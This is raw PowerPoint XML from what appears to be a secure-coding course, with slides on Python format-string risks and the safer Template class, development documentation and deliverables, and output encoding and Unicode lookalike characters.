            <p:nvSpPr>
              <p:cNvPr id="31" name="TextBox 30">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3319359-6EFD-4C8F-A19F-5D9E849EF13B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6476999" y="2054734"/>
                <a:ext cx="989233" cy="404198"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="en-US"/>
                </a:defPPr>
                <a:lvl1pPr algn="ctr"/>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Value 5</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Flowchart: Stored Data 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD60A863-A17E-4419-8CD8-E2DE11BF4A5D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3651349" y="5645136"/>
              <a:ext cx="726993" cy="161583"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartOnlineStorag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050" dirty="0"/>
                <a:t>Buffer</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Flowchart: Stored Data 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAF4B3E4-E796-4570-8CC2-51E34A6E5269}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2920035" y="4814762"/>
              <a:ext cx="726993" cy="161583"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartOnlineStorag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050" dirty="0"/>
                <a:t>Buffer</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Flowchart: Stored Data 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F0421C8-3634-49CF-B3D4-D385B59CD5AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4357512" y="4814760"/>
              <a:ext cx="726993" cy="161583"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartOnlineStorag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050" dirty="0"/>
                <a:t>Buffer </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Flowchart: Stored Data 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08C3752F-B60C-46B2-B207-BB28AB661819}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5095507" y="5645136"/>
              <a:ext cx="726993" cy="161583"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartOnlineStorag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050" dirty="0"/>
                <a:t>Buffer</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Flowchart: Stored Data 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FBE7801-1C4D-4C3E-B43D-1765AF06B70D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5821998" y="4814761"/>
              <a:ext cx="726993" cy="161583"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartOnlineStorag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1050" dirty="0"/>
                <a:t>Buffer</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="46" name="Straight Arrow Connector 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94DADBCC-13F0-46FC-A163-B0CE0B4888DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="12" idx="0"/>
              <a:endCxn id="40" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3283532" y="4976345"/>
              <a:ext cx="5073" cy="185974"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="009DDC"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd type="none" w="lg" len="lg"/>
              <a:tailEnd type="stealth" w="lg" len="lg"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="47" name="Straight Arrow Connector 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD6073BA-1FDF-492E-BD43-2703DEB3B728}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="28" idx="2"/>
              <a:endCxn id="34" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4014846" y="5459163"/>
              <a:ext cx="251" cy="185973"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="009DDC"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd type="none" w="lg" len="lg"/>
              <a:tailEnd type="stealth" w="lg" len="lg"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="50" name="Straight Arrow Connector 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30560BAA-5E09-401F-B46F-5AA990DAD806}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="30" idx="2"/>
              <a:endCxn id="42" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5458753" y="5459163"/>
              <a:ext cx="251" cy="185973"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="009DDC"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd type="none" w="lg" len="lg"/>
              <a:tailEnd type="stealth" w="lg" len="lg"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="53" name="Straight Arrow Connector 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69A60017-761A-4AA0-9F0D-4822C9ADCFA4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="29" idx="0"/>
              <a:endCxn id="41" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4721009" y="4976343"/>
              <a:ext cx="20579" cy="185977"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="009DDC"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd type="none" w="lg" len="lg"/>
              <a:tailEnd type="stealth" w="lg" len="lg"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="59" name="Straight Arrow Connector 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD4273BB-BF39-4785-9DEC-C465B9DF9E02}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="31" idx="0"/>
              <a:endCxn id="43" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6185244" y="4976344"/>
              <a:ext cx="251" cy="185976"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="009DDC"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd type="none" w="lg" len="lg"/>
              <a:tailEnd type="stealth" w="lg" len="lg"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="Rectangle 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A4B6E6B-2664-4E3F-BCD8-33A43F919F01}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4089846" y="4552462"/>
              <a:ext cx="1262324" cy="292388"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="914400">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="009DDC"/>
                  </a:solidFill>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>“unprotected”</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="Rectangle 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D20FBEE-C916-491D-8186-EF344EC1D751}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2693689" y="4552462"/>
              <a:ext cx="1262324" cy="292388"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="914400">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="009DDC"/>
                  </a:solidFill>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>“and”</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="Rectangle 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25C2C57B-C882-4A5D-A769-6008F7BD11BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5554082" y="4552462"/>
              <a:ext cx="1262324" cy="292388"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="914400">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="009DDC"/>
                  </a:solidFill>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>“values”</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="Rectangle 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD8112B4-E8C5-4F5E-88B6-D2FB608FD8C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3363355" y="5777036"/>
              <a:ext cx="1262324" cy="292388"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="914400">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="009DDC"/>
                  </a:solidFill>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>“five”</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="Rectangle 68">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E85C562-FBCB-4475-AA9A-F4BDF7AC3D49}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4827591" y="5777036"/>
              <a:ext cx="1262324" cy="292388"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="914400">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="009DDC"/>
                  </a:solidFill>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>“secret”</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117375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Uncontrolled Format Strings (Slide 3 of 3)</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4020947"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python string formatting has become more flexible, but opportunities for exploit has also increased</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> class from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> module for dealing with user input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More cumbersome but more secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from string import Template</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>greeting_template = Template("Hey there, my name is $name.")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>greeting = greeting_template.substitute(name="Lizzie")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The variable greeting is then evaluated as "Hey there, my name is Lizzie".</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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339632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A399E-21CF-428F-B60B-61A27112C058}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53F90B3F-002C-4BAB-AECA-613FD6505F84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Development Documentation and Deliverables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{020D0D22-278E-49EC-A1AC-AC28EA84DE2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design Documents:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Should flow out of the design phase. For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Functional requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non-functional requirements (including security and privacy quality attributes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test plans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Policy implementation requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Will take various forms, depending on the process you use for requirements-gathering and design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Should be in a form that is useful for developers (clear, concise, complete, realistic, and so forth)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Needs to be reviewed and completely understood by developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deliverables:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source code and executables </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Updates to documentation, test plans, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Comments and meaningful identifiers in source code, and other forms of code documentation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3304690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Insecure Output Encoding (Slide 1 of 2)</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5087985"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often an application produces output that is consumed by a different component or application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure that your app's output uses the expected character set and encoding so it does not cause problems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python 2 used ASCII by default.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python 3 uses Unicode by default.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contains all character sets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Opportunity to misrepresent English letters with letters from another language.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be used in phishing scams.</a:t>
            </a:r>
          </a:p>
          <a:p>
